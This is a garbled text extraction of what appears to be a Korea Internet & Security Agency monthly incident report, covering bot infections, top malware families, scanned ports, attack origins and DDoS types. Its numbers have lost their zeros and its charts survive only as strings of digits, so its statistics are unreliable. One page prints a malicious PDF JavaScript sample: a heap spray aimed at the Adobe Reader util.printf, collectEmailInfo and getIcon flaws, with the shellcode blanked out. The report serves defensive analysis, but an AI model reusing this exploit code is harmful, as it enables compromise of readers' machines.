Korea Internet & Security Agency 21 3
CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35
1 213
Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6% 13 19 45.8%.7.6.1 21 1 2 3 4 5 6 7 8 9 1 11 12 1,395 932 1,32 1,85 3,319 21,23 898 1,76 1,53 3,27 1,148 154 317 222 693 988 78 16 116 3 2,743 232 23 345 87 3,31 223 233 267 723 4,32 211 19 13 54 Bot 1.%.6%.6%.7%.6% 1,6 29 21 1,4 1,32 1,2 1, 932 1,85 8 6 4 2 1 2 3 4 5 6 7 8 9 11112 1,7 1,2 7 317 2 154 222 29 21 1 2 3 4 5 6 7 8 9 11112 16 12 8 78 4 16 116 29 21 1 2 3 4 5 6 7 8 9 11112 Bot 8 6 612 455 463 4 2 29 21 1 2 3 4 5 6 7 8 9 11112 1,3 29 5% 21 1,1 4% 9 3% 7 5 2% 3 211 1% 19.6%.6% 1.7% 13 1 2 3 4 5 6 7 8 9 11112 29 21 1 2 3 4 5 6 7 8 9 1 11 12 2 213
1,395 932 21 1 2 3 4 5 6 7 8 9 1 11 12 1,32 1,85 3,319 18 16 29 21 14 12 1 932 1,32 1,85 8 6 4 2 1 2 3 4 5 6 7 8 9 1 11 12 3 213
21 1 2 3 4 5 6 1 ON LINE GAME HACK 122 AGENT 135 ONLINE GAME HACK 149 2 AGENT 17 BREDOLAB 126 AGENT 18 3 MALWARE 75 AUTORUN 114 PALEVO 65 4 XEMA 52 PALEVO 75 AUTO RUN 6 5 DOWNLOADER 44 MALWARE 61 FAKE AV 48 6 AUTO RUN 39 ONLINE GAME HACK 56 DOWNLOADER 43 7 FAKE AV 24 DOWNLOADER 44 XEMA 41 8 BAGLE 23 FAKESYS 43 LMIRHACK 28 9 BREDOLAB 22 XEMA 39 MALWARE 27 1 INDUC 16 BIFROSE 36 DANOL 26 48 573 49 932 1,32 1,85 4 213
21 1 2 3 4 5 6 7 8 9 1 11 12 1,148 154 317 222 693 988 78 16 116 3 2,743 232 23 345 87 3,31 223 233 267 723 4,32 211 19 13 54 21,23 898 1,76 1,53 3,27 21.1% 25.4% 11% 32.8% 9.8% 5 213
21 1 2 3 4 5 6 7 8 9 1 11 12 4,185 277 362 451 1,9 598 36 3 23 89 239 7 18 38 63 1 1 16,26 578 666 541 1,785 21,23 898 1,76 1,53 3,27 51.4% 2.2% 3.6% 42.8% 21 1 2 3 4 5 6 7 8 9 1 11 12 Windows 14,174 492 633 667 1,792 Linux 4,4 238 257 188 683 Unix 49 17 1 2 29 2,166 151 176 196 523 21,23 898 1,76 1,53 3,27 6 213
988 78 16 116 21 1 2 3 4 5 6 7 8 9 1 11 12 3 18 16 29 21 14 12 16 116 1 8 78 6 4 2 1 2 3 4 5 6 7 8 9 1 11 12 9.5% 96 7.7% 9 82.8% 11 116 7 213
5 4 2 4 9 8 57 3 2 3 3 1 1 1 1 1 1 4 3 4 21 1 2 1 1 19 1 1 2 29 116 66 1 23 12 14.9% 12.1% 1.3% 19.8% 56.9% 116 TCP/8 116 116 1% 8 213
21 1 2 3 4 5 6 7 8 9 1 11 12 4,32 211 19 13 54 1,11 44 48 49 141 7 6 5 4 3 2 1 211 44 19 48 13 49 1 2 3 4 5 6 7 8 9 1 11 12 9 213
21 1 2 3 4 5 6 7 8 9 1 11 12 1.%.6%.6%.7%.6% 3% 2.5% 2% 1.5% 1%.5%.6%.6%.7% % 1,, 9,, 8,, 7,, 6,, 5,, 4,, 3,, 2,, 1,, 1 213
.5% 1.7%.6%.5% 2.8% 19.2% 56.5% 445 139 8 125 135 5.1% 8.1% 86% 445 8 139 23 23 Cisco Telnet 2967 Symantec Exploit 8 WebDAV, ASN.1-HTTP, Cisco HTTP 2745 Bagle, Bagle2 135 DCOM, DCOM2 3127 MyDoom 139 NetBIOS, ASN.1-NT 314 Optix 143 IMail 5 UPNP 445 NetBIOS, LSASS, WksSvc, ASN.1-SMB, DCOM, RPC 611 Veritas Backup Exec 93 NetDevil 6129 Dameware 125 DCOM 173 Kuang2 1433 MS-SQL 27347 Sub7 1) Http://www.microsoft.com/technet/security/current.aspx 2) Http://www.boho.or.kr/pccheck/pcch_5.jsp?page_id=5 11 213
1 1 1 1 1 12 1 8 6 4 2 1 1 2 3 4 5 6 7 8 9 1 11 12 16 14 12 1 8 6 4 2 1 2 3 4 5 6 7 8 9 1 11 12 13 14 15 16 17 18 19 2 21 22 23 24 25 26 27 28 29 3 31 12 213
3,5 3, IP IP 2,5 2, 1,5 1, 5 1 2 3 4 5 6 7 8 9 1 11 12 KISC - Korea Internet Security Center, KISA 13 213
Canada China U.S.A 1% 18% 31% 7% 6% 35% 6% 7% 61% 4% 8% 86% 8% 22% China TCP/1433-tcp service scan TCP/2967-tcp service scan TCP/22-tcp service scan TCP/888-tcp service scan U.S.A TCP/445-netbios smb client to lsasrv request TCP/2967-tcp service scan ICMP-icmp ping Nmap scan TCP/22-tcp service scan Canada UDP/53-udp service scan TCP/445-netbios smb client to lsasrv request TCP/139-worm esbot.a 14 213
1 2 3 4 5 6 7 8 9 1 63.6% 8.9% 7.1% 5.5% 2.2% 1.4% 1.2% 1.%.9%.9% 7.4% 43.7% 16.4% 1.8% 6.1% 3.4% 2.3% 1.9% 1.9% 1.7% 1.4% 1.4% 59.4% 12.2% 8.4% 3.3% 2.3% 1.6% 1.6% 1.1%.9%.8% 8.4% 15 213
netbios smb client to 1 TCP/1433 tcp service scan 25.3% TCP/1433 tcp service scan 22.7% TCP/445 lsasrv request netbios lsass buffer 2 TCP/2967 tcp service scan 16.7% TCP/445 overflow 2 netbios smb client to 3 TCP/22 tcp service scan 1.4% TCP/445 lsasrv request 1.4% TCP/1433 9.4% TCP/2967 tcp service scan tcp service scan netbios smb client to 4 TCP/445 lsasrv request 8.4% TCP/22 tcp service scan 8.8% UDP/53 udp service scan icmp ping Advanced IP 5 TCP/18 tcp service scan 8.1% ICMP Scanner v1.4 4.7% TCP/22 tcp service scan 6 TCP/1521 tcp service scan 2.8% ICMP icmp ping X-scan scan 4.5% TCP/88 tcp service scan 7 8 9 1 TCP/336 tcp service scan 2.5% TCP/18 tcp service scan 4% TCP/888 TCP/8 tcp service scan 2.3% TCP/1 tcp service scan 3.3% TCP/89 TCP/139 worm esbot.a 2.2% TCP/336 tcp service scan 3.2% TCP/889 TCP/88 tcp service scan 2.1% TCP/88 tcp service scan 3% 19.2% 26.2% TCP/8 tcp service scan tcp service scan tcp service scan tcp service scan 18.8% 18% 13.3% 7.4% 7.1% 3.5% 3.2% 3.2% 2.9% 2.8% 19.7% 16 213
42.5% 7.4% 18.8% 13.3% 18% TCP/445 - netbios smb client to lsasrv reauest TCP/1433 - tcp service scan TCP/2967 - tcp service scan UDP/53 - udp service scan 17 213
1 TCP/135 tcp service scan netbios dcerpc 19.1% TCP/135 47.9% TCP/4899 tcp service scan invalid bind 2 TCP/135 netbios dcerpc invalid bind 12.% TCP/135 rpc dcom interface 37.4% TCP/135 netbios dcerpc invalid bind overflow exploit TCP/4899 tcp service scan backdoor famous 3 1.3% UDP/53 worm slammer botnet ddns dns query 8% UDP/1434 4 TCP/1433 tcp service scan 9.% TCP/135 tcp service scan 2.9% TCP/189 tcp service scan rpc dcom interface 5 TCP/135 overflow exploit 7.7% TCP/4899 tcp service scan.9% TCP/1433 tcp service scan 6 TCP/22 tcp service scan 7.% TCP/3389 rpc dcom interface tcp service scan.5% TCP/135 overflow exploit 7 UDP/1434 worm slammer 6.9% TCP/1433 tcp service scan.4% TCP/135 tcp service scan backdoor famous backdoor famous 8 UDP/53 botnet ddns dns query 4.8% UDP/1434 worm slammer.4% UDP/53 botnet ddns dns query 9 TCP/2967 tcp service scan 2.8% TCP/1521 tcp service scan.3% TCP/22 tcp service scan microsoft windows 1 TCP/59 tcp service scan 2.7% TCP/139 pnp overflow exploit -.2% TCP/3389 tcp service scan suspicious zotob 17.7% 1.2% 21.3% 17.5% 15.3% 1.5% 9.5% 5.4% 4.7% 4% 2.5% 1.6% 7.9% 18 213
35.4% 1.5% 15.3% 21.3% 17.5% TCP/4899 - tcp service scan TCP/135 - netbios dcerpc invalid bind UDP/1434 - worm slammer TCP/189 - tcp service scan 19 213
13,, 12,, 11,, 1,, 9,, 8,, 7,, 6,, 5,, 4,, 3,, 2,, 1,, 3 / 1 2 3 4 5 6 7 8 9 1 11 12 13 14 15 16 17 18 19 2 21 22 23 24 25 26 27 28 29 3 31 TCP/8 UDP/9155 TCP/88 TCP/25 UDP/53 TCP/51 TCP/24 TCP/9153 UDP/443 TCP/54 55, 5, 45, 4, 35, 3, 25, 2, 15, 1, 5, 3/1 2 3 4 5 6 7 8 9 1 11 12 13 14 15 16 17 18 2 19 21 22 23 24 25 26 27 28 29 3 31 TCP SYN Flooding(DDoS) Host Sweep UDP Tear Drop TCP ACK Flooding UDP Flooding TCP Connect DOS Ping Sweep HTTP Login B SMB Service sweep (tcp-445) Malicious Data(Etc Packet) 2 213
1 PWS 14.5% PWS 16.3% PWS 16.7% 2 HLLW 13.2% HLLW 12.7% HLLW 16% 3 GENERIC 9.8% GENERIC 8.8% GENERIC 1.9% 4 VIRUT 7.4% BREDLAB 8.4% HLLM 7.1% 5 HLLM 6.9% HLLM 6.5% VIRUT 6.2% 6 DOWNLOADER 5.8% PARITE 6.2% PARITE 4.2% 7 PARITE 5.8% VIRUT 5.6% NSANTI 2.9% 8 NSANTI 2.5% DOWNLOADER 4% ACADAP 2.8% 9 PESTUB 1.9% POLIPOS 3.2% DOWNLOADER 2.6% 1 MULDROP 1.8% ACADAP 2.2% PESTUB 2.3% 3.4% 26.1% 28.3% 1% 1% 1% 21 213
22 213
23 213
24 213
var arry = new Array(); function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(, len / 2); return yarsp; } var version = app.viewerversion; if (version > 8){ var payload = unescape(" "); nop = unescape("%uaa%uaa%uaa%uaa"); heapblock = nop + payload; bigblock = unescape("%uaa%uaa"); headersize = 2; spray = headersize + heapblock.length; while (bigblock.length < spray)bigblock += bigblock; fillblock = bigblock.substring(, spray); block = bigblock.substring(, bigblock.length - spray); while (block.length + spray < x4) block = block + block + fillblock; mem = new Array(); for (i = ; i < 14; i ++ )mem[i] = block + heapblock; var num = ; util.printf("%45f", num); } if (version < 8){ var addkk = unescape(" "); this.collabstore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } if (version < 9.1){ if (app.doc.collab.geticon){ var vvpethya = unescape(" "); app.doc.collab.geticon(tumhnbgw); } } 25 213
26 213
27 213
28 213
29 213
3 213
1,731 36 5,621 7,352 1 2 3 4 5 6 7 8 9 1 11 12 52 88 62 13 169 22 192 371 21 267 384 651 31 213
14 29 21 12 1 8 6 4 2 1,64 1,95 797 86 684 582 526 385 47 416 371 192 273 317 88 1 2 3 4 5 6 7 8 9 1 11 12 4,561 4 68 542 6 12 329 1,84 1 2 3 4 5 6 7 8 9 1 11 12 5 37 111 1 7 8 65 156 1 27 15 172 21 7,352 88 192 371 651 37 2 4 28 274 46.4% 42.% 7.3% 4.%.3% 32 213
21 1 2 3 4 5 6 7 8 9 1 11 12 2,519 28 39 97 164 1,8 17 7 73 16 3,33 43 83 21 327 7,352 88 192 371 651 33 213
22 8 135 139 445 125 18 1433 1434 2745 341 4899 5 6129 88 34 213
35 213
Trojan Phishing ASP.NET Botnet DHTML Editing Component ActiveX E-mail Hyperlink KrCERT/CC LLS NetBIOS OLE/COM PNG SMB TCP Syn Flooding Windows SharePoint Services Windows Shell 39 212